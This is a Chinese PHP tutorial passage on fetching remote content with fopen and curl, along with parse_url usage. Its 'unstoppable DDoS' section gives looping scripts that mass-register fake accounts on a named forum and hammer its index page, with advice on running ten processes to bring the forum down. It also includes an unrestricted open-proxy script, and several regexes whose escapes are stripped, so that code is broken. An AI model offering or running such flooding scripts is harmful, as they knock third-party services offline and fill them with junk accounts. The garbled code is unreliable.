本节是 PHP获取远程文件内容实例详解 第二部分的内容。
五、HTTP代理(http://jsw.china12e.com/600/)
复制代码 代码示例:
<?
$url = getenv("QUERY_STRING");
if(!ereg("^http",$url))
{
echo "example:<br>xxx.php?http://jsw.china12e.com/<;br>";
exit;
}
if($url)
$url=str_replace("","/",$url);
$f=@fopen($url,"r");
$a="";
if($f)
{
while(!feof($f))
$a.=@fread($f,8000);
fclose($f);
}
$rooturl = preg_replace("/(.+/)(.*)/i","1",$url);
$a = preg_replace("/(src[[:space:]]*=['"])([^h].*?)/is","1$rooturl2",$a);
$a = preg_replace("/(src[[:space:]]*=)([^h'"].*?)/is","1$rooturl2",$a);
$a = preg_replace("/(action[[:space:]]*=['"])([^h].*?)/is","1$php_self?$rooturl2",$a);
$a = preg_replace("/(action[[:space:]]*=)([^h'"].*?)/is","1$php_self?$rooturl2",$a);
$a = preg_replace("/(<a.+?href[[:space:]]*=['"])([^h].*?)/is","1$php_self?$rooturl2",$a);
$a = preg_replace("/(<a.+?href[[:space:]]*=[^'"])([^h].*?)/is","1$php_self?$rooturl2",$a);
$a = preg_replace("/(link.+?href[[:space:]]*=[^'"])(.*?)/is","1$rooturl2",$a);
$a = preg_replace("/(link.+?href[[:space:]]*=['"])(.*?)/is","1$rooturl2",$a);
echo $a;
?>
六:不可阻挡DDOS攻击
DDOS的一个例子
复制代码 代码示例:
<?php
$url="http://bbs.jb200.com/register.php?step=2&addpassword=aaaaaa&addpassword2=aaaaaa&addemail=asdfasd@dfsadsf.com&addusername=";
for($i=1131;$i<=1150;$i++)
{
$urls=$url.$i;
$f=@fopen($urls,"r");
$a=@fread($f,10);
fclose($f);
}
?>
运行后论坛将新增20个用户
(例子:http://bbs.jb200.com/userlist.php?page=827)
当把它用在论坛的搜索中时
DDOS攻击就实现了
以下的代码攻击INDEX.php文件,同时运行十个进程时,可能时论坛关闭
复制代码 代码示例:
<?php
$url="http://bbs.jb200.com/index.php?addusername=";
for($i=1131;$i<=1180;$i++)
{
$urls=$url.$i;
$f=@fopen($urls,"r");
$a=@fread($f,10);
fclose($f);
}
?>
完整url地址:
http://username:password@hostname/path?arg=value#auchor
协议:http://
用户名和密码: username:password 以:将两者分隔
主机名:hostname @和/为分隔符
路径: /path 以/开头、包含/符号
参数键值对: arg=value&arg1=value1 ?和#为分隔符、每对键值对之间用&分隔
锚:auchor 以#开头
用parse_url()获取相关信息
复制代码 代码示例:
$url = "http://www.electrictoolbox.com/php-extract-domain-from-full-url/";
$parts = parse_url($url);
//
Array
(
[scheme] => http
[host] => www.electrictoolbox.com
[path] => /php-extract-domain-from-full-url/
)
<?php
$url = 'http://username:password@hostname/path?arg=value#anchor';
print_r(parse_url($url));
echo parse_url($url, PHP_URL_PATH);
//
Array
(
[scheme] => http
[host] => hostname
[user] => username
[pass] => password
[path] => /path
[query] => arg=value
[fragment] => anchor
)
可以看到,可以很容易分解出一个URL的各个部,那如果要拿指定的部分出来的话也很容易,如
echo parse_url($url, PHP_URL_PATH);
就是在第二个参数中,设定如下的参数:
PHP_URL_SCHEME, PHP_URL_HOST, PHP_URL_PORT, PHP_URL_USER, PHP_URL_PASS, PHP_URL_PATH, PHP_URL_QUERY or PHP_URL_FRAGMENT.
七、最后还有一个
复制代码 代码示例:
if ( !function_exists( 'fopen_url' ) )
{
function fopen_url($url)
{
$file_content = '';
if (function_exists('
file_get_contents')) $file_content = @file_get_contents($url);
elseif (ini_get('allow_url_fopen') && ($file = @fopen($url, 'rb')))
{
$i = 0;
while (!feof($file) && $i++ < 1000) $file_content .= strtolower(fread($file, 4096));
fclose($file);
}
elseif (function_exists('curl_init'))
{
$curl_handle = curl_init();
curl_setopt($curl_handle, CURLOPT_URL, $url);
curl_setopt($curl_handle, CURLOPT_CONNECTTIMEOUT,5);
curl_setopt($curl_handle, CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl_handle, CURLOPT_FAILONERROR,1);
curl_setopt($curl_handle, CURLOPT_USERAGENT, 'Trackback Spam Check');
$file_content = curl_exec($curl_handle);
curl_close($curl_handle);
}
return $file_content;
}
}
